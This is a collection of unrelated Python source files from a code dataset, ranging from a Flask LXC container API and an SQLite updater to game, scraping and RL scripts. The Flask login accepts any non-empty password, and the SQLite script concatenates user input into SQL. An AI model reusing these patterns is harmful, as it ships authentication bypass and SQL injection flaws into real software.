+ '&'.join(query_build_str)\n\n def get_sanitized_data(self) -> str:\n if self._output_text is not None:\n return self._output_text\n elif self._repository_list is None:\n return \"\"\n else:\n # previously gathered repositories\n repositories = self._repository_list\n\n output_text_buffer = list()\n output_text_buffer.append(\"Total entries found: %s\" % len(repositories))\n output_text_buffer.append(\"----------------------------------------\")\n if self.extended_output:\n output_text_buffer.append('\\n'.join(\"#%s\\t\\t\\t%s\\t\\t\\t\\t\\t\\t%s\" %\n (idx, i['full_name'], transform_date(i['created_at']))\n for idx, i in enumerate(repositories)))\n else:\n output_text_buffer.append('\\n'.join(i['full_name'] for i in repositories))\n\n self._output_text = '\\n'.join(output_text_buffer)\n return self._output_text\n\n def create_query(self, time_range):\n return ''.join([ApplicationContext.ROOT_ENDPOINT, self.PATH_SEARCH, self.get_query_str(time_range)])\n\n def run(self):\n time_diff = 10\n time_range = get_time_range(time_diff)\n request_url = self.create_query(time_range)\n\n # Collection of items gathered throughout api calls and processed for output\n items = []\n total_repo_count = 0\n if self.sort_type == 'default':\n while True:\n # Gather items and sort them by creation date\n # GitHub API doesn't support sorting by creation date\n request = requests.get(request_url)\n content = request.json()\n\n try:\n items.extend(content['items'])\n except KeyError: # This error repeats if API limit is exceeded\n print(\"Error, API limit is most likely exceeded, try again in a bit.\")\n print(\"Here is message:\")\n print(content['message'])\n exit(2)\n\n total_repo_count += content['total_count']\n\n if total_repo_count > self.entry_number:\n # each request can only contain up to 100 entries\n # gather them with multiple requests by traversing the list-like structure\n try:\n request_url = request.links['next']['url']\n continue\n except KeyError:\n break\n elif total_repo_count == self.entry_number:\n break\n else:\n # Our search query contains fewer items than we need,\n # Increase range for filtering and re-try\n try:\n if len(items) == 0:\n # Multiply search range by 6 if there are no entries\n time_diff *= 6\n time_range = get_time_range(time_diff)\n else:\n # Multiply search range by 3 starting from creation date of last entry in range\n time_diff *= 3\n last_date = min(items, key=sort_by_creation_date)['created_at']\n # Reduced by 1 second to ensure no duplicates\n time_range = get_time_range(time_diff,\n time_higher=load_api_date(last_date) - timedelta(seconds=1))\n\n request_url = self.create_query(time_range)\n continue\n except KeyError:\n break\n\n items = sorted(items, key=sort_by_creation_date, reverse=True)\n\n else:\n request = requests.get(request_url)\n content = request.json()\n items.extend(content['items'])\n\n self._repository_list = items[0:self.entry_number]\n", "sub_path": "github_browser/application_context/list_application_context.py", "file_name": "list_application_context.py", "file_ext": "py", "file_size_in_byte": 5353, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "github_browser.time_adapter.get_time_range", "line_number": 21, "usage_type": "call"}, {"api_name": "github_browser.time_adapter.transform_date", "line_number": 48, "usage_type": "call"}, {"api_name": "github_browser.time_adapter.get_time_range", "line_number": 61, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 
71, "usage_type": "call"}, {"api_name": "github_browser.time_adapter.get_time_range", "line_number": 101, "usage_type": "call"}, {"api_name": "github_browser.time_adapter.sort_by_creation_date", "line_number": 105, "usage_type": "name"}, {"api_name": "github_browser.time_adapter.get_time_range", "line_number": 107, "usage_type": "call"}, {"api_name": "github_browser.time_adapter.load_api_date", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 108, "usage_type": "call"}, {"api_name": "github_browser.time_adapter.sort_by_creation_date", "line_number": 115, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 118, "usage_type": "call"}]}
+{"seq_id": "163548935", "text": "import pygame\nimport src.colours as colours\nfrom src.entity import Entity\nfrom pygame.math import Vector2\n\nclass Particle(Entity):\n\n def __init__(self, pos: Vector2, width, height, ttl, colour):\n Entity.__init__(self, pos.x, pos.y, width, height, None)\n # Not sure why we need to manually set pygame's layer?\n # even calling move_to_front didn't work.\n self._layer = 1\n self.pos = pos\n self.image = pygame.Surface((width, height)).convert_alpha()\n self.image.fill(colour)\n self.ttl = ttl\n\n def update(self, dt):\n self.ttl -= 1\n", "sub_path": "src/game_object/particle.py", "file_name": "particle.py", "file_ext": "py", "file_size_in_byte": 596, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "src.entity.Entity", "line_number": 6, "usage_type": "name"}, {"api_name": "pygame.math.Vector2", "line_number": 8, "usage_type": "name"}, {"api_name": "src.entity.Entity.__init__", "line_number": 9, "usage_type": "call"}, {"api_name": "src.entity.Entity", "line_number": 9, "usage_type": "name"}, {"api_name": "pygame.Surface", "line_number": 14, "usage_type": "call"}]}
+{"seq_id": "161021598", "text": "#!/usr/bin/env python\n\n# lxc-api , created 7/2014\n# Create by Chris Haessig\n\n\n# Import Yaml, Flash nad custom LXC library\n\nfrom yaml import safe_load\nfrom flask import Flask, session, redirect, url_for, escape, request\napp = Flask(__name__)\nfrom lxc import lxccontrol\n\n# Example Text\n\nexample_text = \"\"\"\nGET /login - Auth to server
\nGET /list - List all the LXC containers
\nGET /create// - Create a LXC
\nGET /destroy/ - Destroy LXC
\nGET /freeze/ - Freeze a LXC
\nGET /unfreeze/ - Unfreeze a LXC
\nGET /snapshot/ - Snapshot a LXC
\n\"\"\"\n\n# Open Yaml file and grab values\n\nwith open(\"api.yaml\") as f:\n y = f.read()\n\nyam = safe_load(y)\nusername = yam['username']\npassword = yam['password']\ntoken = yam['token']\nport = yam['port']\nhost = yam['host']\n\n# List all LXC\n\n@app.route('/list')\ndef list():\n if 'LoggedIn' in session:\n return lxccontrol(\"list\")\n else:\n return \"\"\n\n\n# Default, does nothing\n\n@app.route('/')\ndef index():\n if 'LoggedIn' in session:\n return 'Ready...'\n return redirect(url_for('login'))\n\n# Login to lxc-api\n\n@app.route('/login', methods=['GET','POST'])\ndef login():\n if request.method == 'POST':\n if request.form['username'] == username and request.form['password']:\n session['LoggedIn'] = \"yes\"\n return redirect(url_for('index'))\n return '''\n
{0}\n '''.format(example_text)\n\n# Logout\n\n@app.route('/logout')\ndef logout():\n # remove the username from the session if it's there\n if 'LoggedIn' in session:\n session.pop('LoggedIn', None)\n return redirect(url_for('index'))\n else:\n return \"\"\n\n\n# Stop LXC\n\n@app.route('/stop/')\ndef delete(machine):\n if 'LoggedIn' in session:\n return lxccontrol(\"stop\",machine)\n\n# Start LXC\n\n@app.route('/start/')\ndef start(machine):\n if 'LoggedIn' in session:\n return lxccontrol(\"start\",machine)\n else:\n return \"\"\n\n# Snapshot LXC\n\n@app.route('/snapshot/')\ndef snapshot(machine):\n if 'LoggedIn' in session:\n return lxccontrol(\"snapshot\",machine)\n else:\n return \"\"\n\n# Freeze LXC\n\n@app.route('/freeze/')\ndef freeze(machine):\n if 'LoggedIn' in session:\n return lxccontrol(\"freeze\",machine)\n else:\n return \"\"\n\n# Unfreeze LXC\n\n@app.route('/unfreeze/')\ndef unfreeze(machine):\n if 'LoggedIn' in session:\n return lxccontrol(\"unfreeze\",machine)\n else:\n return \"\"\n \n# Destroy LXC\n\n@app.route('/destroy/')\ndef destroy(machine):\n if 'LoggedIn' in session:\n return lxccontrol(\"destroy\",machine)\n else:\n return \"\"\n\n@app.route('/create//')\ndef create(types,machine):\n if 'LoggedIn' in session:\n return lxccontrol(\"create\",machine,types)\n else:\n return \"\"\n\n\n\n# Set session token\n\napp.secret_key = token\n\nif __name__ == '__main__':\n app.run(host,port)\n\n", "sub_path": "api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 3103, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 42, "usage_type": "name"}, {"api_name": "lxc.lxccontrol", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 60, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 60, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 61, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 61, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 62, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 77, "usage_type": "name"}, {"api_name": "flask.session.pop", "line_number": 78, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 88, "usage_type": "name"}, {"api_name": "lxc.lxccontrol", "line_number": 89, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 95, "usage_type": "name"}, {"api_name": "lxc.lxccontrol", "line_number": 96, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 104, "usage_type": "name"}, {"api_name": "lxc.lxccontrol", "line_number": 105, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 113, "usage_type": "name"}, {"api_name": 
"lxc.lxccontrol", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 122, "usage_type": "name"}, {"api_name": "lxc.lxccontrol", "line_number": 123, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 131, "usage_type": "name"}, {"api_name": "lxc.lxccontrol", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 138, "usage_type": "name"}, {"api_name": "lxc.lxccontrol", "line_number": 139, "usage_type": "call"}]}
+{"seq_id": "276288275", "text": "import ENV\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom RFL import DeepQNetwork\nfrom matplotlib import animation\n#import collections\n\n#def init(): #to plot the GIF\n# line.set_ydata(Func.BeamFunc(xxx))\n# return line,\n\ndef update(i): #to plot the GIF\n Wave.set_ydata(ENV.BeamFunc(Plot_data[i]))\n return Wave,\n\ndef run():\n step = 0\n #compare = lambda x, y: collections.Counter(x) == collections.Counter(y) \n for episode in range(100):\n # initial observation\n observation = ENV.reset() #get the initial observaion (position)\n rewards= [] #record rewards in the episode \n Plot_data= [] #record the observation (position) to plot\n Init_X= observation #the initial observation (position)\n \n while True:\n # RL choose action based on observation\n action = RL.Choose_Actions(observation)\n\n # RL take action and get next observation, reward, next Maximal side-lobe\n observation_, reward, done, MSL_ = ENV.step(action, observation)\n \n rewards.append(reward)\n print(\"Episode:\", episode)\n print(\"Step\", step)\n print(\"Max Side Lobe:\", MSL_)\n print(\"Position:\", observation)\n print(\"reward:\", sum(rewards)) \n print('*'*40)\n #if compare(observation, observation_):\n # print(\"SAME\")\n #else:\n # print(\"Different\")\n \n RL.store_transition(observation, action, reward, observation_) #store the data\n \n if (step > 200) and (step % 5 == 0): #當步數大於200後, 每5步學習一次\n RL.learn()\n \n observation = observation_# swap observation\n \n Plot_data.append(observation)\n \n # break while loop when end of this episode\n if done:\n break\n step += 1\n\n print('Complete')\n \n return Plot_data, Init_X\n \n \n \nif __name__ == \"__main__\":\n RL = DeepQNetwork(40, 20,\n learning_rate=0.01,\n reward_decay=0.9,\n e_greedy=0.9,\n replace_target_iter=200,\n memory_size=2000,\n # output_graph=True\n )\n \n Plot_data, Init_X= run()\n \n fig, ax = plt.subplots()\n theta= np.arange(0, np.pi, 0.001)\n \n Wave0= ax.plot(theta*180/np.pi, ENV.BeamFunc(Init_X), 'r--') #plot the initial wave (red line)\n Wave,= ax.plot(theta*180/np.pi, ENV.BeamFunc(Init_X), 'b--') #update the wave (blue line), \",\"為了更新值時的類型匹配\n \n ax.set_xlabel(r'$theta$')\n ax.set_ylabel(r'$dB$')\n\n ax.axis([0,180,-30,0])\n ax.grid(color= 'g', linestyle= '--', linewidth= 1, alpha= 0.4)\n \n \n ani= animation.FuncAnimation(fig, update, frames=len(Plot_data), interval=100, blit=False) #get dymanic Waves\n ani.save('4.gif', writer='imagemagick') #save the GIF\n \n plt.show()\n \n RL.plot_cost()#!/usr/bin/env python3\n", "sub_path": "Run.py", "file_name": "Run.py", "file_ext": "py", "file_size_in_byte": 3141, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "ENV.BeamFunc", "line_number": 13, "usage_type": "call"}, {"api_name": "ENV.reset", "line_number": 21, "usage_type": "call"}, {"api_name": "ENV.step", "line_number": 31, "usage_type": "call"}, {"api_name": "RFL.DeepQNetwork", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 78, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 80, "usage_type": "attribute"}, {"api_name": "ENV.BeamFunc", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 81, "usage_type": 
"attribute"}, {"api_name": "ENV.BeamFunc", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.animation.FuncAnimation", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.animation", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}]}
+{"seq_id": "616122441", "text": "import sqlite3\n\nconn = sqlite3.connect('db — копия.sqlite')\nc = conn.cursor()\n\na = str(input(\"Введи название таблицы: sbc_live, sbc_osn, sbc_prod, trade \" + '\\n', 'red'))\nid = str(input(\"Введи id строки в таблице\" + '\\n'))\nname = str(input(\"Введи значение поля 'name'\" + '\\n'))\n\nup = \"UPDATE\" + \" \" + a + \" \" + \"SET\" + \" \" + \"name=\" + \"'\" + name + \"'\" + \"WHERE id=\" + \"'\" + id + \"'\"\nc.execute(up)\nconn.commit()\n\nfile_id = str(input(\"Введи значение поля 'file_id'\" + '\\n'))\nup = \"UPDATE\" + \" \" + a + \" \" + \"SET\" + \" \" + \"file_id=\" + \"'\" + file_id + \"'\" + \"WHERE id=\" + \"'\" + id + \"'\"\nc.execute(up)\nconn.commit()\n\ntxt = str(input(\"Введи значение поля 'txt'\" + '\\n'))\nup = \"UPDATE\" + \" \" + a + \" \" + \"SET\" + \" \" + \"txt=\" + \"'\" + txt + \"'\" + \"WHERE id=\" + \"'\" + id + \"'\"\nc.execute(up)\nconn.commit()\nprint(\"Готово\")\n\nc.close()\nconn.close()", "sub_path": "sqlite_manager BETA/sqlite_manager.py", "file_name": "sqlite_manager.py", "file_ext": "py", "file_size_in_byte": 938, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sqlite3.connect", "line_number": 3, "usage_type": "call"}]}
+{"seq_id": "581593628", "text": "import web\nimport json\nfrom logger.logger import *\nfrom data.dataAccess import *\nfrom data.security import *\nfrom data.purchase import *\nfrom data.client import *\nfrom factory.purchase import *\n\nclass Purchase:\n\tdef GET(self, statusId):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tresults = query(\"CALL Tejuana.PurchaseList({0})\".format(statusId))\n\t\t\treturn purchaseListFactory(results)\n\n\tdef POST(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tdata = web.data()\n\t\t\tlogPayload(data)\n\t\t\tpurchase = json.loads(data)\n\t\t\tinsertPurchase(purchase)\n\nclass PurchaseStatus:\n\tdef GET(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tresults = query(\"SELECT * FROM Tejuana.Purchase_Status\")\n\t\t\treturn purchaseStatusFactory(results)\n\n\nclass Client:\n\tdef GET(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tsearch = web.ctx.env.get('QUERY_STRING').split('=')[1]\n\t\t\tresults = query(\"CALL Tejuana.ClientsBy('{0}')\".format(search))\n\t\t\taddresses = query(\"CALL Tejuana.AddressesBy('{0}')\".format(search))\n\t\t\treturn clientListFactory(results, addresses)\n\n\tdef PUT(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tdata = web.data()\n\t\t\tlogPayload(data)\n\t\t\tclient = json.loads(data)\n\t\t\tupdateClient(client)\n\n\tdef POST(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tdata = web.data()\n\t\t\tlogPayload(data)\n\t\t\tclient = json.loads(data)\n\t\t\tinsertClient(client)\n", "sub_path": "rest/purchase.py", "file_name": "purchase.py", "file_ext": "py", "file_size_in_byte": 1433, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "web.ctx.env.get", "line_number": 12, "usage_type": "call"}, {"api_name": "web.ctx", "line_number": 12, "usage_type": "attribute"}, {"api_name": "web.ctx.env.get", "line_number": 17, "usage_type": "call"}, {"api_name": "web.ctx", "line_number": 17, "usage_type": "attribute"}, {"api_name": "data.dataAccess", "line_number": 18, "usage_type": "name"}, {"api_name": "web.data", "line_number": 18, "usage_type": "call"}, {"api_name": "data.dataAccess", "line_number": 19, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 20, "usage_type": "call"}, {"api_name": "data.dataAccess", "line_number": 20, "usage_type": "argument"}, {"api_name": "web.ctx.env.get", "line_number": 25, "usage_type": "call"}, {"api_name": "web.ctx", "line_number": 25, "usage_type": "attribute"}, {"api_name": "web.ctx.env.get", "line_number": 32, "usage_type": "call"}, {"api_name": "web.ctx", "line_number": 32, "usage_type": "attribute"}, {"api_name": "web.ctx.env.get", "line_number": 33, "usage_type": "call"}, {"api_name": "web.ctx", "line_number": 33, "usage_type": "attribute"}, {"api_name": "web.ctx.env.get", "line_number": 39, "usage_type": "call"}, {"api_name": "web.ctx", "line_number": 39, "usage_type": "attribute"}, {"api_name": "data.dataAccess", "line_number": 40, "usage_type": "name"}, {"api_name": "web.data", "line_number": 40, "usage_type": "call"}, {"api_name": "data.dataAccess", "line_number": 41, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 42, "usage_type": "call"}, {"api_name": "data.dataAccess", "line_number": 42, "usage_type": "argument"}, {"api_name": "web.ctx.env.get", "line_number": 46, "usage_type": "call"}, {"api_name": "web.ctx", "line_number": 46, "usage_type": 
"attribute"}, {"api_name": "data.dataAccess", "line_number": 47, "usage_type": "name"}, {"api_name": "web.data", "line_number": 47, "usage_type": "call"}, {"api_name": "data.dataAccess", "line_number": 48, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 49, "usage_type": "call"}, {"api_name": "data.dataAccess", "line_number": 49, "usage_type": "argument"}]}
+{"seq_id": "278612056", "text": "from rest_framework import viewsets, exceptions\nfrom rest_framework.response import Response\nfrom . import models\nfrom . import serializers\nfrom catalogues import models as catalogues_models\n\n\nclass AssignedCarsView(viewsets.ModelViewSet):\n serializer_class = serializers.AssignedCarSerializer\n queryset = models.AssignedCars.objects.all()\n\n def retrieve(self, request, *args, **kwargs):\n try:\n user = catalogues_models.Users.objects.get(\n pk=self.kwargs.get('pk')\n )\n except catalogues_models.Users.DoesNotExist:\n raise exceptions.NotFound({'message': 'El usuario no existe'})\n instance = models.AssignedCars.objects.filter(\n idUser=user\n )\n response = serializers.AssignedCarSerializer(\n instance,\n many=True\n )\n return Response(response.data)\n\n\nclass UsedCarsView(viewsets.ModelViewSet):\n serializer_class = serializers.UsedCarSerializer\n queryset = models.UsedCar.objects.all()\n", "sub_path": "control/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1027, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 8, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 8, "usage_type": "name"}, {"api_name": "catalogues.models.Users.objects.get", "line_number": 14, "usage_type": "call"}, {"api_name": "catalogues.models.Users", "line_number": 14, "usage_type": "attribute"}, {"api_name": "catalogues.models", "line_number": 14, "usage_type": "name"}, {"api_name": "catalogues.models.Users", "line_number": 17, "usage_type": "attribute"}, {"api_name": "catalogues.models", "line_number": 17, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.NotFound", "line_number": 18, "usage_type": "call"}, {"api_name": "rest_framework.exceptions", "line_number": 18, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 26, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 29, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 29, "usage_type": "name"}]}
+{"seq_id": "413046838", "text": "import sys\nimport youtube_dl\nimport os\nimport googleapiclient.discovery\nimport json\n\nclass YoutubeDownloader:\n API_SERVICE_NAME = \"youtube\"\n API_VERSIONE = \"v3\"\n YDL_OPTS = {\n 'outtmpl': 'preview.mp3', \n 'format': 'bestaudio/best',\n 'noplaylist': True,\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }]\n }\n \n def __init__(self):\n with open('api_key.json') as f:\n data = json.load(f)\n developer_key = data['api-key']\n self.youtube = googleapiclient.discovery.build(self.API_SERVICE_NAME, self.API_VERSIONE, developerKey = developer_key)\n\n def download_song(self, url):\n try:\n youtube_dl.YoutubeDL(self.YDL_OPTS).download([url])\n return url\n except youtube_dl.utils.DownloadError:\n return False \n \n def search(self, name, artists):\n # can make cleaner\n search_name = name\n for artist in artists:\n if artist in name:\n continue\n search_name = search_name + \" \" + artist\n \n search_name = search_name + \" audio\"\n print(search_name)\n request = self.youtube.search().list(\n q = search_name,\n part=\"id\",\n maxResults=3\n )\n\n response = request.execute()\n if response['pageInfo']['totalResults'] <= 0:\n return False\n for v in response['items']:\n if v['id']['kind'] == \"youtube#video\":\n # getting the specific video id for each video in the playlist\n song = v\n \n print(song)\n # downloading a specific youtube video\n return 'https://www.youtube.com/watch?v='+song['id']['videoId']", "sub_path": "spotify_dl/youtube_downloader.py", "file_name": "youtube_downloader.py", "file_ext": "py", "file_size_in_byte": 1829, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "json.load", "line_number": 23, "usage_type": "call"}, {"api_name": "googleapiclient.discovery.discovery.build", "line_number": 25, "usage_type": "call"}, {"api_name": "googleapiclient.discovery.discovery", "line_number": 25, "usage_type": "attribute"}, {"api_name": "googleapiclient.discovery", "line_number": 25, "usage_type": "name"}, {"api_name": "youtube_dl.YoutubeDL", "line_number": 29, "usage_type": "call"}, {"api_name": "youtube_dl.utils", "line_number": 31, "usage_type": "attribute"}]}
+{"seq_id": "516870135", "text": "#coding:utf-8\n\nimport json\n\n__metaclass__= type\n\n__all__= [ u'get_combat_cfg', u'clear_combat_cfg', u'load_combat_cfg', u'cfg2combat' ]\n\n\n# combat_cfg= {\n# u'image' : u'image path',\n# u'self_camp' : self_camp,\n# u'enemy_camp' : enemy_camp,\n# u'name' : u'scene_name',\n# u'light' : light,\n# u'dark' : dark,\n# u'chaos' : chaos,\n# u'dlight_min' : dlight_min,\n# u'dlight_max' : dlight_max,\n# u'ddark_min' : ddark_min,\n# u'ddark_max' : ddark_max,\n# u'dchaos_min' : dchaos_min,\n# u'dchaos_max' : dchaos_max,\n# u'character_cfg_ids' : [\n# character_cfg_id,\n# ],\n# u'on_update' : u'callback_name',\n# }\n\n_id2combat_cfg= {}\n\ndef get_combat_cfg( cfg_id ) :\n return _id2combat_cfg.get( cfg_id, None )\n\ndef clear_combat_cfg() :\n _id2combat_cfg.clear()\n\ndef load_combat_cfg( file_path ) :\n with open( file_path, u'rU' ) as fp :\n id2data= json.load( fp )\n _id2combat_cfg.update( id2data )\n\n\ndef cfg2combat( cfg, combat ) :\n combat.name= cfg[u'name']\n combat.light= cfg[u'light']\n combat.dark= cfg[u'dark']\n combat.chaos= cfg[u'chaos']\n combat.light_max= cfg[u'light_max']\n combat.dark_max= cfg[u'dark_max']\n combat.chaos_max= cfg[u'chaos_max']\n combat.dlight_min= cfg[u'dlight_min']\n combat.dlight_max= cfg[u'dlight_max']\n combat.ddark_min= cfg[u'ddark_min']\n combat.ddark_max= cfg[u'ddark_max']\n combat.dchaos_min= cfg[u'dchaos_min']\n combat.dchaos_max= cfg[u'dchaos_max']\n\n\n", "sub_path": "game/combat.py", "file_name": "combat.py", "file_ext": "py", "file_size_in_byte": 1493, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "json.load", "line_number": 40, "usage_type": "call"}]}
+{"seq_id": "573573957", "text": "import openpyxl\nclass doExcel:\n def do_excel(self,button,caseid):\n wb=openpyxl.load_workbook(\"readData.xlsx\")\n sheet = wb[\"testData\"]\n headers =[]\n for i in range(1,6):\n headers.append(sheet.cell(1,i).value)\n # print(headers)\n\n test_data=[]\n for i in range(2,6):\n sub_data ={}\n for j in range(1,6):\n # print(sheet.cell(i,j).value)\n sub_data[headers[j-1]]=sheet.cell(i,j).value\n test_data.append(sub_data)\n if button == 'on':\n final_data = test_data\n else:\n final_data = []\n for item in test_data:\n if item['caseid'] in caseid:\n final_data.append(item)\n return final_data\n def writeBack(self,row,actualres,testres):\n wb = openpyxl.load_workbook(\"readData.xlsx\")\n sheet = wb['testData']\n sheet.cell(row,6).value = actualres\n sheet.cell(row,7).value = testres\n wb.save('readData.xlsx')\n\n#\nif __name__ == '__main__':\n res =doExcel().do_excel('on',[1,2])\n print(res)", "sub_path": "ut_demo_01/readfromexcel.py", "file_name": "readfromexcel.py", "file_ext": "py", "file_size_in_byte": 1119, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "openpyxl.load_workbook", "line_number": 4, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "429019722", "text": "\nimport numpy as np\nimport logging\n\nlogging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s',\n level=logging.INFO)\n\n\ndef truncated_normal(mean, stddev, minval, maxval):\n \"\"\"\n Method to draw a random number from a truncated normal distribution\n\n Args:\n mean (int): mean of distribution\n stddev (float): standard deviation of distribution\n minval (int): lower boundary\n maxval (int): upper boundary\n\n Returns:\n (int): the number drawn\n \"\"\"\n return int(np.clip(np.random.normal(mean, stddev), minval, maxval))\n\n\nclass Player(object):\n \"\"\"\n Poker player object capable of playing games\n Takes action and decide about amount to be bet by prompting user\n\n Attributes:\n initial_stack (int): amount of chips he started with\n stack (int): amount of chips he owns at any given time\n name (str): name of the player\n \"\"\"\n\n def __init__(self, stack, name):\n \"\"\"\n Instantiating the object using a numeric stack and a name\n e.g. Player(100,\"Joe\")\n \"\"\"\n self.initial_stack = stack\n self.stack = stack\n self.name = name\n\n def reset_stack(self):\n \"\"\"\n Reset stack to initial amount\n \"\"\"\n logging.debug('{} resets its stack from {}$ to {}$'\n .format(self.name, self.stack, self.initial_stack))\n self.stack = self.initial_stack\n\n def bet_amount(self, bet_size):\n \"\"\"\n Adjust stack based on amount player is betting\n Player is all-in if bets more than stack\n\n Args:\n bet_size (int): any number\n \"\"\"\n if bet_size >= self.stack:\n logging.debug('{} bets {}$ into the pot and is ALL-IN'\n .format(self.name, self.stack))\n self.stack = 0\n else:\n self.stack = self.stack - bet_size\n logging.debug('{} bets {}$ into the pot'\n .format(self.name, bet_size))\n\n def win_pot(self, pot_size):\n \"\"\"\n Adjust stack based on amount player is winning\n\n Args:\n pot_size (int): any number\n \"\"\"\n self.stack = self.stack + pot_size\n logging.debug('{} wins the pot: +{}$'\n .format(self.name, pot_size))\n\n def split_pot(self, pot_size):\n \"\"\"\n Adjust stack based on amount player is getting from a split pot\n\n Args:\n pot_size (int): any number\n \"\"\"\n self.stack = self.stack + int(pot_size/2)\n logging.debug('{} splits the pot: +{}$'\n .format(self.name, int(pot_size/2)))\n\n def get_back_from_pot(self, amount):\n \"\"\"\n Adjust stack based on amount player is getting back from a pot where he\n has put in more in the pot than the other player has chips,\n and the other player end up going all in\n\n Args:\n amount (int): any number\n \"\"\"\n self.stack = self.stack + amount\n logging.debug('{} gets +{}$ back from the pot'\n .format(self.name, amount))\n\n def choose_amount(self, minimum=None, maximum=None,\n pot_size=None, std_dev=50):\n \"\"\"\n Getting amount to bet from player by selecting an amount randomly\n by drawing a number from a truncated normal distribution centered\n around the pot size - only relevant for No Limit version of the game\n\n Args:\n minimum (int): minimum amount that is required, default None\n maximum (int): maximum amount that is required, default None\n pot_size (int): amount in pot at the moment of decision, used as\n the mean of the distribution , default None\n std_dev (float): standard deviation of the distribution,\n default is set arbitrarily to 50\n\n Returns:\n bet_size (int): the amount to bet\n \"\"\"\n if self.stack <= minimum:\n bet_size = self.stack\n elif maximum:\n bet_size = truncated_normal(pot_size, std_dev, minimum, maximum)\n else:\n bet_size = 
